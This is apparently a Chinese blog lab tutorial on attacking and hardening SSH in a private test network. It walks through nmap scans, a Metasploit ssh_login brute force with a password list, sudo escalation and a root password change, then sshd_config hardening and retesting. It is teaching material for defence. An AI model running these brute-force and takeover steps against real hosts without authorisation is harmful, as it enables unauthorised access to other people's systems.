网络安全: Kali Linux 进行 SSH 渗透与防御

目录

一、实验

1.环境

2.nmap扫描目标主机

[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)

[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)

二、问题

1.SSH有哪些安全配置


一、实验

1.环境

(1)主机

表1 主机

|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |

(2)查看Kali Linux (2022.4)系统版本

bash 复制代码
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

bash 复制代码
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

bash 复制代码
lsb_release -a
bash 复制代码
ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

复制代码
 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

复制代码
nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

bash 复制代码
msfconsole

(2) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(3) 使⽤编号为 0 的脚本

复制代码
use 0

(4) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(4)查看选项

bash 复制代码
show options

(5)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(6)运⾏脚本

bash 复制代码
run 

(7)查看会话

bash 复制代码
sessions

(8)连接会话

bash 复制代码
sessions 1

查看用户身份

bash 复制代码
whoami

查看路径

bash 复制代码
pwd

提升权限

bash 复制代码
 sudo -i

再次查看用户身份

bash 复制代码
whoami

更改密码

bash 复制代码
password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改端口

(2)重启

bash 复制代码
/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

bash 复制代码
msfconsole

(6) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(6) 使⽤编号为 0 的脚本

bash 复制代码
use 0

(7) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(8)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(9)运⾏脚本

失败

bash 复制代码
run 

(10)nmap扫描端口

ssh端口为12345

bash 复制代码
nmap -sV 192.168.204.143

(11)查看选项

bash 复制代码
show options

(12) 设置目标端口

bash 复制代码
set rport 12345

(13)运⾏脚本

bash 复制代码
run 

( 14)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

bash 复制代码
/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

bash 复制代码
vim /etc/ssh/sshd_config

修改容错次数

(18)重启

bash 复制代码
/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

bash 复制代码
Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers [email protected]    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

bash 复制代码
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

bash 复制代码
exit -y
相关推荐
南朝雨5 分钟前
linux下安装elasticsearch及ik分词器
linux·elasticsearch·全文检索
leblancAndSherry5 分钟前
Gitlab + Jenkins 实现 CICD
linux·运维·docker·kubernetes·gitlab·jenkins
半桔1 小时前
【Linux手册】探秘系统世界:从用户交互到硬件底层的全链路工作之旅
linux·运维·服务器·面试·centos
wanhengidc1 小时前
服务器中CC攻击的特点有哪些?
运维·服务器
小杜的生信筆記1 小时前
生信服务器 | 做生信为什么推荐使用Linux服务器?
linux·运维·服务器
luopeng2076634361 小时前
虚拟局域网中配置某台服务器作为网关的方案
运维·服务器·php
ARM2NCWU1 小时前
高密度ARM服务器的散热设计
运维·服务器
wanhengidc1 小时前
站群服务器的应用场景都有哪些?
运维·服务器
毒果2 小时前
网络安全全景解析
安全·web安全
WangY_ZQ2 小时前
Python 如何在Python 3.6上安装PIP
linux·python·pip